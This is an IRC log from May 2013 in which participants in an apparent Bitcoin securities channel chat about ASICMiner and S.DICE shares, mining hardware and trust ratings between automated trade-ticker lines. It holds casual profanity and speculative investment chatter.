2.38026 BTC [-] May 24 01:37:16 benkay_: just no options activity recently May 24 01:37:27 when price moves, watch out! May 24 01:39:50 hey fiolks May 24 01:39:59 jurov what's thatg? i can't see the link May 24 01:40:18 [BTCTC] [ASICMINER-PT] 1 @ 2.3803 BTC [+] May 24 01:40:20 [BTCTC] [ASICMINER-PT] 1 @ 2.3802 BTC [-] May 24 01:40:30 benkay_ oix only counts options sold by bot. people have been mostly shorting this month, so bot didn't sell much of anything May 24 01:41:09 mircea it's btctalk trust from mpoe-pr to me, for 10k btc May 24 01:41:22 okay... May 24 01:41:24 as if she invested 10k via coinbr May 24 01:41:29 a May 24 01:41:42 (maybe she did indeed?) May 24 01:41:46 i guess it's more of a degree of magnitude thing May 24 01:42:17 i thought maybe she gave you a scammer tag lol May 24 01:42:47 lolvshe's welcome May 24 01:43:03 [HAVELOCK] [SDICE] 2 @ 0.22 = 0.44 BTC [+] May 24 01:44:53 in any case,thanks for appreciation May 24 01:46:02 "What is the acronym "OTC?" I haven't heard that one yet..." May 24 01:46:32 i'm curious if there are any other cases of 10k-valued trust published around May 24 01:46:33 on the cock May 24 01:47:04 off the cliff May 24 01:47:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.02425 = 0.2425 BTC [-] May 24 01:47:34 [BTCTC] [TAT.ASICMINER] 6 @ 0.02425 = 0.1455 BTC [-] May 24 01:47:50 only two coins May 24 01:48:08 oh this cunt May 24 01:48:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.02422 = 0.2422 BTC [-] May 24 01:50:16 https://bitcointalk.org/index.php?topic=214563.0;topicseen May 24 01:50:17 wtf May 24 01:50:25 >their limits is 250 btc May 24 01:50:30 incoming limit of 250? May 24 01:51:03 [HAVELOCK] [VTX] 1 @ 0.421 BTC [+] May 24 01:51:04 [HAVELOCK] [VTX] 1 @ 0.41111 BTC [-] May 24 01:52:16 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [+] May 24 01:52:57 amazing May 24 01:54:37 [MPEX] [S.MPOE] 5000 @ 0.00070461 = 3.5231 BTC [-] May 24 01:58:12 http://trilema.com/2013/burlysque-a-musical/ May 24 01:58:18 is anyone in the house a musical producer ? May 24 01:59:02 [HAVELOCK] [ASICM] 10 @ 0.0246 = 0.246 BTC [-] May 24 01:59:03 [HAVELOCK] [ASICM] 10 @ 0.02488 = 0.2488 BTC [+] May 24 01:59:41 eh thats cheap May 24 02:01:49 mircea_popescu: if its paying I know people May 24 02:02:01 see teh article. May 24 02:02:02 [HAVELOCK] [ASICM] 1 @ 0.0248 BTC [-] May 24 02:02:03 [HAVELOCK] [ASICM] 9 @ 0.0246 = 0.2214 BTC [-] May 24 02:02:35 i mean, its funny and all, just cheap May 24 02:02:45 oh May 24 02:03:03 I thought music production not producing musicals May 24 02:03:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.024101 BTC [-] May 24 02:03:28 my great aunt produces musicals but she is a cunt May 24 02:03:34 lmfao May 24 02:04:03 kakobrekla srsly ? May 24 02:04:07 e.g. I am required to address her as great aunt May 24 02:04:50 so say great cunt once by mistake May 24 02:04:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.024101 = 0.1687 BTC [-] May 24 02:05:03 hence she is unlikely to want to tackle such subject matter May 24 02:05:24 she has probably never heard the word cunt May 24 02:05:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02409 BTC [-] May 24 02:05:38 riight. and she was never half naked in a car either May 24 02:05:43 cause she was 68 at 19 too May 24 02:06:02 [HAVELOCK] [ASICM] 10 @ 0.02488 = 0.2488 BTC [+] May 24 02:06:16 cuz there was no sex in 1960s May 24 02:06:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.02405 = 0.2646 BTC [-] May 24 02:06:57 a ok May 24 02:07:02 lets change teh subject before I lose my breakfast May 24 02:09:12 mmm dub great aunt sex May 24 02:09:16 oh dub is now embodied innocence... do you at least remember what you did yest in #bitcoin-trollbox? May 24 02:09:30 what did he do May 24 02:09:47 that was beyond words May 24 02:10:01 screenshot then May 24 02:10:08 ya, draw it lol May 24 02:10:27 not here May 24 02:11:12 [BTCTC] [TAT.ASICMINER] 39 @ 0.02405 = 0.938 BTC [-] May 24 02:11:26 that was nothing May 24 02:11:38 give us something May 24 02:11:40 whatever you are reffering to May 24 02:11:50 the star of davidstika? May 24 02:12:02 https://bitcointalk.org/index.php?topic=212021.msg2244119#msg2244119 May 24 02:12:04 that was problably the most offensive May 24 02:12:11 check her out haha May 24 02:12:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.024001 = 0.24 BTC [-] May 24 02:13:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.024 = 0.12 BTC [-] May 24 02:13:31 jurov: which one did you find offensive? May 24 02:13:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.023999 = 0.24 BTC [-] May 24 02:14:21 i'm out of my wit here May 24 02:14:31 was not offended, jsut teasing you May 24 02:14:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.023999 BTC [-] May 24 02:14:46 well I clearly havent been trying May 24 02:15:14 [BTCTC] [BASIC-MINING] 6 @ 0.62 = 3.72 BTC [+] May 24 02:21:20 [BTCTC] [TAT.ASICMINER] 71 @ 0.024 = 1.704 BTC [+] May 24 02:22:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.0245 = 0.1225 BTC [+] May 24 02:22:37 [BTCTC] [TAT.ASICMINER] 17 @ 0.02487 = 0.4228 BTC [+] May 24 02:24:02 [HAVELOCK] [ASICM] 5 @ 0.02488 = 0.1244 BTC [+] May 24 02:26:14 [BTCTC] [ASICMINER-PT] 1 @ 2.440299 BTC [+] May 24 02:27:03 [HAVELOCK] [VTX] 1 @ 0.422 BTC [+] May 24 02:30:40 [BTCTC] [ASICMINER-PT] 3 @ 2.440299 = 7.3209 BTC [+] May 24 02:30:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4403 BTC [+] May 24 02:30:49 [BTCTC] [ASICMINER-PT] 1 @ 2.44085 BTC [+] May 24 02:30:51 [BTCTC] [ASICMINER-PT] 1 @ 2.4409 BTC [+] May 24 02:33:18 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [+] May 24 02:36:04 [BTCTC] [ASICMINER-PT] 9 @ 2.441 = 21.969 BTC [+] May 24 02:36:06 [BTCTC] [GSDPT] 5 @ 0.0026 = 0.013 BTC [+] May 24 02:36:08 [BTCTC] [GSDPT] 2 @ 0.0026 = 0.0052 BTC [+] May 24 02:39:03 [HAVELOCK] [VTX] 2 @ 0.4236 = 0.8472 BTC [+] May 24 02:39:28 [BTCTC] [TAT.ASICMINER] 30 @ 0.024 = 0.72 BTC [-] May 24 02:40:37 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [+] May 24 02:41:40 [MPEX] [S.MPOE] 4321 @ 0.00070659 = 3.0532 BTC [+] May 24 02:41:42 [MPEX] [S.MPOE] 9779 @ 0.00070684 = 6.9122 BTC [+] May 24 02:42:28 [BTCTC] [S.MPOE-PT] 1 @ 0.0007 BTC [+] May 24 02:43:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.02486 = 0.1243 BTC [+] May 24 02:49:03 [HAVELOCK] [ASICM] 16 @ 0.02488 = 0.3981 BTC [+] May 24 02:49:05 [BTCTC] [ASICMINER-PT] 4 @ 2.441 = 9.764 BTC [+] May 24 02:53:15 [BTCTC] [ASICMINER-PT] 6 @ 2.441 = 14.646 BTC [+] May 24 03:04:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02487 BTC [+] May 24 03:04:56 [BTCTC] [ASICMINER-PT] 1 @ 2.4403 BTC [-] May 24 03:06:03 [HAVELOCK] [ASICM] 17 @ 0.02525 = 0.4293 BTC [+] May 24 03:06:04 [HAVELOCK] [ASICM] 80 @ 0.0259 = 2.072 BTC [+] May 24 03:06:05 [HAVELOCK] [ASICM] 403 @ 0.026 = 10.478 BTC [+] May 24 03:08:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.02487 BTC [+] May 24 03:09:12 https://forums.butterflylabs.com/announcements/692-bfl-asic-status-3.html May 24 03:09:19 2 weeks May 24 03:09:20 shipping next week guys May 24 03:09:24 o no ?! May 24 03:09:31 forealz May 24 03:09:32 wait. i thought they shipped already May 24 03:09:41 I cant wait May 24 03:09:51 oh but you will May 24 03:09:57 hahaha! May 24 03:09:59 prolly.. May 24 03:10:02 [HAVELOCK] [ASICM] 2 @ 0.026 = 0.052 BTC [+] May 24 03:10:06 what does the difficulty look like May 24 03:10:34 if i get 70 ghash online initially.. May 24 03:10:55 sold all of my mining equipment a long time ago May 24 03:11:13 Going back to my old google doc from October calculating how much BTC I was going to make off GIGAMINING is kinda funny May 24 03:11:26 So many projections... May 24 03:11:31 lol May 24 03:11:33 So little to show for it May 24 03:11:50 Any projection which is equal or less than current income? May 24 03:12:02 [HAVELOCK] [ASICM] 11 @ 0.02599 = 0.2859 BTC [-] May 24 03:12:35 [MPEX] [S.MPOE] 2450 @ 0.00070461 = 1.7263 BTC [-] May 24 03:12:37 [MPEX] [S.MPOE] 4321 @ 0.00070416 = 3.0427 BTC [-] May 24 03:12:39 [MPEX] [S.MPOE] 4492 @ 0.00070415 = 3.163 BTC [-] May 24 03:12:49 [MPEX] [S.MPOE] 29485 @ 0.00070412 = 20.761 BTC [-] May 24 03:13:12 is it possible AM could fall on their face, thus bringing down the difficulty May 24 03:13:28 could anything happen if they get too much of the total network speed? May 24 03:13:33 Would be funny... May 24 03:13:46 Fire or something... May 24 03:13:51 government May 24 03:14:35 Bugpowder? May 24 03:14:49 How much do you get now out of your Gigamining? May 24 03:16:12 this sounds like a shitty deal: ' indefinite contract, which costs $246. This runs for as long as the user wants, and provides 1 Ghash/sec of compute power. With this type of contract, 30 percent of the return is reinvested in additional computing power' May 24 03:17:40 1 Ghash? May 24 03:17:47 Sounds good to me May 24 03:18:34 Where? May 24 03:19:28 lol May 24 03:19:36 I haven't claimed my shares yet May 24 03:19:45 not worth my time May 24 03:19:50 oh... how many did you have? May 24 03:19:54 KRS-1 it's quite improbable. May 24 03:20:08 the only thing is that both avalon and bitfury claim to have tons of chips right around the corner May 24 03:20:16 AM seems like they know what they are doing May 24 03:20:28 but come on... 2.5BTC / share? May 24 03:20:35 AM does know what they're doing, apparently May 24 03:20:49 I totally missed the boat on them May 24 03:20:53 Bugpowder, it's just that BTC stocks tend to take a value around 1%/week May 24 03:21:08 I should have bought 10 000 @ 0.1 BTC each back then May 24 03:21:15 Namworld: yeah but that rate is unsustainable May 24 03:21:37 Would only have paid 5000 USD or 1000 BTC May 24 03:21:38 noob ventures take a value around 1% a week, last for 30 weeks tops May 24 03:21:49 Now I'd have 25000 BTC or 2.5 million May 24 03:21:52 Lol... May 24 03:21:55 Bitcoin securities investors seem to be unable to look more than 45 days in advance May 24 03:22:14 most S.DICE investors look backwards May 24 03:22:22 how much are we up this month May 24 03:22:24 If they can't do that, why would they pay 100x weekly revenue? May 24 03:22:37 although on a volume weighted basis that isn't true May 24 03:22:40 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 24 03:22:42 Like 400 BTC up for SDICE at latest news May 24 03:23:02 Namworld: yes I know. Just vocalizing the mindset. May 24 03:23:23 [BTCTC] [ASICMINER-PT] 40 @ 2.441 = 97.64 BTC [+] May 24 03:23:28 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [+] May 24 03:23:32 S.DICE at .002 looks pretty damn good to me. May 24 03:23:59 Our chips consume about 3 - 3.5w per GH/s at the chip level May 24 03:24:03 way to blow a spec lol May 24 03:24:16 [BTCTC] [TAT.ASICMINER] 11 @ 0.02487 = 0.2736 BTC [+] May 24 03:24:30 Well unless S.DICE volume picks up, 0.002 seems ok, but not damn good May 24 03:24:50 I'd buy at 0.0015 May 24 03:24:53 personally May 24 03:25:01 [BTCTC] [TAT.ASICMINER] 48 @ 0.02491 = 1.1957 BTC [+] May 24 03:25:21 [BTCTC] [ASICMINER-PT] 7 @ 2.441 = 17.087 BTC [+] May 24 03:25:31 If they made a stable 5000 BTC each month May 24 03:25:33 Namworld: I'm forward looking May 24 03:25:58 That's 30 months to reach 0.0015 in dividends May 24 03:26:03 If you believe its truly a money tree scam where erik is recycling into it, then don't buy May 24 03:26:05 [BTCTC] [TAT.ASICMINER] 14 @ 0.02496 = 0.3494 BTC [+] May 24 03:26:16 But they don't even earn that May 24 03:26:29 Nah, I don't think it's a scam. May 24 03:26:37 i suspect the stability point for bitcoin securities is way way under 1% per year May 24 03:26:39 probably more like .1% May 24 03:26:59 They sometimes earn 20,000 BTC /mo May 24 03:27:00 course this strictly applies to securities. May 24 03:27:08 insecurities are a different story. May 24 03:27:10 will they do that again? I dunnno May 24 03:27:14 Bugpowder, true May 24 03:27:22 But will that come back? May 24 03:27:27 but I would say its probably a 50/50 proposition May 24 03:27:51 that they have another comparably huge month again within the next 4 months. May 24 03:28:02 [HAVELOCK] [ASICM] 238 @ 0.025 = 5.95 BTC [-] May 24 03:28:03 0.1% per year? Too meager returns in my taste May 24 03:28:16 and then you get a 10% divided from that cost basis and a 250% gain in share price. May 24 03:29:00 S.DICE is a Buffet play May 24 03:29:02 [HAVELOCK] [ASICM] 24 @ 0.0249 = 0.5976 BTC [-] May 24 03:29:04 [HAVELOCK] [ASICM] 16 @ 0.0249 = 0.3984 BTC [-] May 24 03:29:19 maybe not him May 24 03:29:21 but you know May 24 03:29:30 probably undervalued based on its potential May 24 03:29:35 people panic and shit May 24 03:29:57 moreover, the people atm involved are mostly kids trying to bootstrap themselves into financiers on a shoestring May 24 03:30:02 [HAVELOCK] [ASICM] 24 @ 0.02495 = 0.5988 BTC [+] May 24 03:30:11 once actual capital starts moving in it's a different story. May 24 03:30:42 (and no, actual capital ain't measured in millions) May 24 03:31:14 Coinroll has made 1/4th of SD profit so far this month. SD really isn't lucky this month. May 24 03:31:44 yeah, but S.DICE luck should be totally irrelevant to the share price May 24 03:31:45 really May 24 03:31:55 volume is what matters May 24 03:31:58 yes May 24 03:32:09 inasmuch as we know they can pay, yeah. May 24 03:32:18 true May 24 03:32:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.02496 = 0.1248 BTC [+] May 24 03:32:21 Namworld what happens to coinroll if it hits a -5k ? May 24 03:32:28 or w/e, a -heavy May 24 03:32:44 but in bitcoinland, S.DICE instant divided level drives the price strongly. May 24 03:33:01 Thats why I threw up some bids when they went down 2k. May 24 03:33:03 [HAVELOCK] [ASICM] 97 @ 0.0249 = 2.4153 BTC [-] May 24 03:33:48 SD has had about ~90'000 BTC volume this month May 24 03:33:51 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [+] May 24 03:34:02 [HAVELOCK] [ASICM] 8 @ 0.0247 = 0.1976 BTC [-] May 24 03:36:01 [HAVELOCK] [ASICM] 7 @ 0.0247 = 0.1729 BTC [-] May 24 03:37:07 sup foglight May 24 03:37:08 [HAVELOCK] [ASICM] 97 @ 0.0245 = 2.3765 BTC [-] May 24 03:37:38 you dump your AM yet? May 24 03:42:54 not yet May 24 03:43:24 gamblin' man May 24 03:43:41 If I had kept my shares, I'd be selling like a madman May 24 03:45:15 [MPEX] [S.MPOE] 4321 @ 0.00070677 = 3.054 BTC [+] May 24 03:45:17 [MPEX] [S.MPOE] 14945 @ 0.00070684 = 10.5637 BTC [+] May 24 03:46:15 [BTCTC] [ASICMINER-PT] 1 @ 2.4899 BTC [+] May 24 03:47:02 [HAVELOCK] [ASICM] 10 @ 0.0258 = 0.258 BTC [+] May 24 03:47:10 [BTCTC] [ASICMINER-PT] 1 @ 2.450001 BTC [-] May 24 03:47:47 [BTCTC] [ASICMINER-PT] 4 @ 2.45 = 9.8 BTC [-] May 24 03:48:03 [BTCTC] [ASICMINER-PT] 2 @ 2.4899 = 4.9798 BTC [+] May 24 03:48:09 [BTCTC] [ASICMINER-PT] 2 @ 2.49 = 4.98 BTC [+] May 24 03:48:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.02496 = 0.1248 BTC [+] May 24 03:49:40 [MPEX] [S.DICE] 1000 @ 0.00241971 = 2.4197 BTC [-] May 24 03:49:42 [MPEX] [S.DICE] 853 @ 0.00241972 = 2.064 BTC [+] May 24 03:49:50 [MPEX] [S.DICE] 147 @ 0.00274996 = 0.4042 BTC [+] May 24 03:51:44 [MPEX] [S.DICE] 450 @ 0.00274996 = 1.2375 BTC [+] May 24 03:56:20 [BTCTC] [ASICMINER-PT] 8 @ 2.45 = 19.6 BTC [-] May 24 04:05:11 why's that? May 24 04:05:14 AM tanking? May 24 04:16:02 [HAVELOCK] [ASICM] 87 @ 0.02411 = 2.0976 BTC [-] May 24 04:16:03 [HAVELOCK] [ASICM] 1 @ 0.02451 BTC [+] May 24 04:16:05 [HAVELOCK] [ASICM] 300 @ 0.0244 = 7.32 BTC [-] May 24 04:16:06 [HAVELOCK] [ASICM] 1 @ 0.02425 BTC [-] May 24 04:16:07 [HAVELOCK] [ASICM] 9 @ 0.02421001 = 0.2179 BTC [-] May 24 04:16:08 [HAVELOCK] [ASICM] 6 @ 0.0242 = 0.1452 BTC [-] May 24 04:16:09 [HAVELOCK] [ASICM] 4 @ 0.02411 = 0.0964 BTC [-] May 24 04:17:03 [HAVELOCK] [ASICM] 6 @ 0.02411 = 0.1447 BTC [-] May 24 04:18:14 [BTCTC] [COGNITIVE] 1 @ 0.289999 BTC [+] May 24 04:18:22 [BTCTC] [ASICMINER-PT] 1 @ 2.4789 BTC [+] May 24 04:18:58 [BTCTC] [COGNITIVE] 1 @ 0.29 BTC [+] May 24 04:20:33 [BTCTC] [ASICMINER-PT] 1 @ 2.4601 BTC [-] May 24 04:21:01 [HAVELOCK] [HIM] 1 @ 2.3101 BTC [+] May 24 04:22:02 [HAVELOCK] [SDICE] 1 @ 0.2201 BTC [+] May 24 04:22:03 [HAVELOCK] [SDICE] 2 @ 0.22 = 0.44 BTC [-] May 24 04:23:02 [HAVELOCK] [SDICE] 1 @ 0.22 BTC [-] May 24 04:25:24 [MPEX] [S.DICE] 903 @ 0.00274996 = 2.4832 BTC [+] May 24 04:28:10 [BTCTC] [ASICMINER-PT] 1 @ 2.4789 BTC [+] May 24 04:30:21 [BTCTC] [ASICMINER-PT] 2 @ 2.4789 = 4.9578 BTC [+] May 24 04:30:29 [BTCTC] [ASICMINER-PT] 3 @ 2.4879 = 7.4637 BTC [+] May 24 04:37:02 [HAVELOCK] [ASICM] 50 @ 0.0258 = 1.29 BTC [+] May 24 04:48:07 [BTCTC] [TAT.ASICMINER] 16 @ 0.02496 = 0.3994 BTC [+] May 24 04:50:02 [HAVELOCK] [ASICM] 21 @ 0.0242 = 0.5082 BTC [-] May 24 04:53:50 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [-] May 24 04:55:11 [BTCTC] [GSDPT] 12 @ 0.0026 = 0.0312 BTC [+] May 24 04:56:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02539 BTC [+] **** BEGIN LOGGING AT Fri May 24 12:56:23 2013 May 24 12:57:30 [BTCTC] [TAT.ASICMINER] 22 @ 0.0258 = 0.5676 BTC [+] May 24 13:02:03 they have about 5th offline atm http://www.asicminercharts.com/live/ May 24 13:02:13 why is that ? May 24 13:02:21 ;;nethash May 24 13:02:23 91261.2224951 May 24 13:03:11 they usually have some go offline when thet are adding or tweaking May 24 13:03:16 temporary May 24 13:03:36 ;;bc,stats May 24 13:03:38 Current Blocks: 237674 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 213 blocks | Next Difficulty In About: 1 day, 5 hours, 12 minutes, and 41 seconds | Next Difficulty Estimate: 12062213.1227 | Estimated Percent Change: 7.821 May 24 13:04:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.02588 = 0.1035 BTC [+] May 24 13:12:19 [BTCTC] [ASICMINER-PT] 1 @ 1.6 BTC [-] May 24 13:15:44 "I am willing to pay top dollar for someone to help me cosign a mortgage. I have no family I can ask. I have good credit and equity. I need someone in California with good credit and high income." May 24 13:15:50 bwagagaga ok this is the best yet. May 24 13:16:40 sign me up! May 24 13:17:28 I'd imagine there'd be quite a few drug dealers interested in creating such an offer. May 24 13:18:06 [BTCTC] [ASICMINER-PT] 1 @ 2.535 BTC [+] May 24 13:20:01 as opposed to you know... simply bankrupt people. May 24 13:34:42 [BTCTC] [ASICMINER-PT] 2 @ 2.579 = 5.158 BTC [+] May 24 13:35:26 [BTCTC] [ASICMINER-PT] 2 @ 2.58 = 5.16 BTC [+] May 24 13:36:03 [HAVELOCK] [ASICM] 4 @ 0.0258 = 0.1032 BTC [+] May 24 13:38:10 [BTCTC] [ASICMINER-PT] 1 @ 2.525 BTC [-] May 24 13:38:32 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [+] May 24 13:40:02 [BTCTC] [ASICMINER-PT] 4 @ 2.589 = 10.356 BTC [+] May 24 13:40:14 [BTCTC] [ASICMINER-PT] 1 @ 2.525001 BTC [-] May 24 13:41:45 [BTCTC] [TAT.ASICMINER] 61 @ 0.02588 = 1.5787 BTC [+] May 24 13:42:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.02589 = 0.2071 BTC [+] May 24 13:43:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02589 BTC [+] May 24 13:45:06 [HAVELOCK] [ASICM] 1 @ 0.0258 BTC [+] May 24 13:45:21 [BTCTC] [S.DICE-PT] 7 @ 0.00287 = 0.0201 BTC [-] May 24 13:45:31 [BTCTC] [ASICMINER-PT] 1 @ 2.5101 BTC [-] May 24 13:45:33 [BTCTC] [ASICMINER-PT] 1 @ 2.576 BTC [+] May 24 13:46:45 [BTCTC] [ASICMINER-PT] 3 @ 2.51 = 7.53 BTC [-] May 24 13:49:28 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] May 24 13:49:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.02589 BTC [+] May 24 13:51:23 [BTCTC] [ASICMINER-PT] 1 @ 2.565 BTC [+] May 24 13:51:26 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [+] May 24 13:55:14 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [-] May 24 13:56:01 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [-] May 24 14:00:41 [BTCTC] [ASICMINER-PT] 1 @ 2.512 BTC [+] May 24 14:05:33 !ticker bc asicminer-pt May 24 14:05:33 Aren't those tins of tobacco right there behind you? May 24 14:05:35 [BTCTC] [ASICMINER-PT] 1 @ 2.5001 BTC [-] May 24 14:05:42 !ticker bt asicminer-pt May 24 14:05:44 [BTCT:ASICMINER-PT] 1D: 2.314 / 2.44787 / 2.589 (1144 shares, 2800.4 BTC), 7D: 1.81 / 2.3486 / 2.743 (5660 shares, 13293.1 BTC), 30D: 1.0711 / 1.82434 / 2.743 (13397 shares, 24440.7 BTC) May 24 14:06:34 [BTCTC] [ASICMINER-PT] 2 @ 2.50011 = 5.0002 BTC [+] May 24 14:12:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.02589 = 0.1036 BTC [+] May 24 14:17:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] May 24 14:18:16 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [+] May 24 14:18:46 [BTCTC] [ASICMINER-PT] 2 @ 2.538 = 5.076 BTC [+] May 24 14:20:35 [BTCTC] [ASICMINER-PT] 2 @ 2.538 = 5.076 BTC [+] May 24 14:20:45 [BTCTC] [ASICMINER-PT] 4 @ 2.539 = 10.156 BTC [+] May 24 14:20:55 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [-] May 24 14:24:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.02589 = 0.3107 BTC [+] May 24 14:26:45 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] May 24 14:33:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02589 BTC [+] May 24 14:34:41 [BTCTC] [ASICMINER-PT] 1 @ 2.543999 BTC [+] May 24 14:35:06 [BTCTC] [ASICMINER-PT] 3 @ 2.51 = 7.53 BTC [-] May 24 14:35:08 [BTCTC] [ASICMINER-PT] 2 @ 2.507 = 5.014 BTC [-] May 24 14:35:11 [BTCTC] [ASICMINER-PT] 2 @ 2.506 = 5.012 BTC [-] May 24 14:35:11 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [-] May 24 14:35:18 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] May 24 14:35:20 [BTCTC] [ASICMINER-PT] 1 @ 2.500002 BTC [-] May 24 14:35:22 [BTCTC] [ASICMINER-PT] 203 @ 2.500001 = 507.5002 BTC [-] May 24 14:35:24 [BTCTC] [ASICMINER-PT] 8 @ 2.5 = 20 BTC [-] May 24 14:37:02 [HAVELOCK] [ASICM] 10 @ 0.0258 = 0.258 BTC [+] May 24 14:40:02 [BTCTC] [ASICMINER-PT] 1 @ 2.501001 BTC [+] May 24 14:46:06 [BTCTC] [ASICMINER-PT] 2 @ 2.501 = 5.002 BTC [-] May 24 14:47:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] May 24 14:47:11 [BTCTC] [TAT.ASICMINER] 38 @ 0.0256 = 0.9728 BTC [-] May 24 14:47:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.02551 = 0.051 BTC [-] May 24 14:47:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.02551 = 0.2551 BTC [-] May 24 14:47:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.0255 = 0.204 BTC [-] May 24 14:47:19 [BTCTC] [TAT.ASICMINER] 41 @ 0.025314 = 1.0379 BTC [-] May 24 14:47:45 [BTCTC] [ASICMINER-PT] 1 @ 2.538999 BTC [+] May 24 14:54:08 [BTCTC] [ASICMINER-PT] 1 @ 2.470001 BTC [-] May 24 14:54:11 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 24 14:54:28 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 24 14:54:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4511 BTC [-] May 24 14:55:07 [BTCTC] [ASICMINER-PT] 1 @ 2.451001 BTC [-] May 24 14:55:25 [BTCTC] [ASICMINER-PT] 1 @ 2.450003 BTC [-] May 24 14:55:44 [BTCTC] [ASICMINER-PT] 1 @ 2.450002 BTC [-] May 24 14:56:05 [BTCTC] [ASICMINER-PT] 1 @ 2.450001 BTC [-] May 24 14:58:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.025315 = 0.1266 BTC [+] May 24 15:00:26 [BTCTC] [TAT.ASICMINER] 40 @ 0.02589 = 1.0356 BTC [+] May 24 15:00:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.02589 BTC [+] May 24 15:00:49 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 24 15:03:02 [HAVELOCK] [ASICM] 6 @ 0.0258 = 0.1548 BTC [+] May 24 15:07:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.025889 = 0.1036 BTC [-] May 24 15:14:16 [BTCTC] [RSM] 1 @ 0.00866 BTC [-] May 24 15:14:18 [BTCTC] [RSM] 2 @ 0.00865 = 0.0173 BTC [-] May 24 15:14:23 [BTCTC] [PAJKA.BOND] 2 @ 0.109988 = 0.22 BTC [+] May 24 15:27:46 [BTCTC] [ASICMINER-PT] 10 @ 2.504 = 25.04 BTC [+] May 24 15:29:52 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [+] May 24 15:34:04 [HAVELOCK] [ASICM] 1 @ 0.0258 BTC [+] May 24 15:34:05 [HAVELOCK] [ASICM] 13 @ 0.0258 = 0.3354 BTC [+] May 24 15:41:02 [HAVELOCK] [SDICE] 10 @ 0.22 = 2.2 BTC [-] May 24 15:42:10 [BTCTC] [ASICMINER-PT] 5 @ 2.506 = 12.53 BTC [+] May 24 15:44:01 [HAVELOCK] [ASICM] 5 @ 0.0258 = 0.129 BTC [+] May 24 15:47:02 [HAVELOCK] [ASICM] 6 @ 0.0258 = 0.1548 BTC [+] May 24 15:48:46 [BTCTC] [ASICMINER-PT] 1 @ 2.528 BTC [+] May 24 15:48:49 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [+] May 24 15:52:02 [HAVELOCK] [ASICM] 25 @ 0.0258 = 0.645 BTC [+] May 24 15:52:56 [BTCTC] [ASICMINER-PT] 2 @ 2.505 = 5.01 BTC [-] May 24 15:53:02 [HAVELOCK] [ASICM] 46 @ 0.0258 = 1.1868 BTC [+] May 24 15:55:37 [BTCTC] [TAT.ASICMINER] 14 @ 0.0258 = 0.3612 BTC [-] May 24 15:56:23 [BTCTC] [TAT.ASICMINER] 98 @ 0.0258 = 2.5284 BTC [-] May 24 15:56:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.0258 = 0.0774 BTC [-] May 24 15:56:38 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [+] May 24 16:04:41 [BTCTC] [TAT.ASICMINER] 26 @ 0.025889 = 0.6731 BTC [+] May 24 16:08:26 [BTCTC] [TAT.ASICMINER] 9 @ 0.0254 = 0.2286 BTC [-] May 24 16:10:24 ;;bc,24hprc May 24 16:10:27 125.08 May 24 16:13:03 [HAVELOCK] [SDICE] 1 @ 0.225 BTC [+] May 24 16:14:52 "Could TAT shares just be pegged to 1/100 the price of PT shares? I think theres alot of arbitrage going on between the prices of the two causing extra market volatility ... It just seems illogical that at times 100 TAT shares can cost more than 1 PT share when they only pay 95% of the PT dividend." May 24 16:14:59 oh, the humanity May 24 16:16:02 [HAVELOCK] [ASICM] 9 @ 0.02579 = 0.2321 BTC [-] May 24 16:16:03 That would be hell to implement May 24 16:16:15 and totally retarded May 24 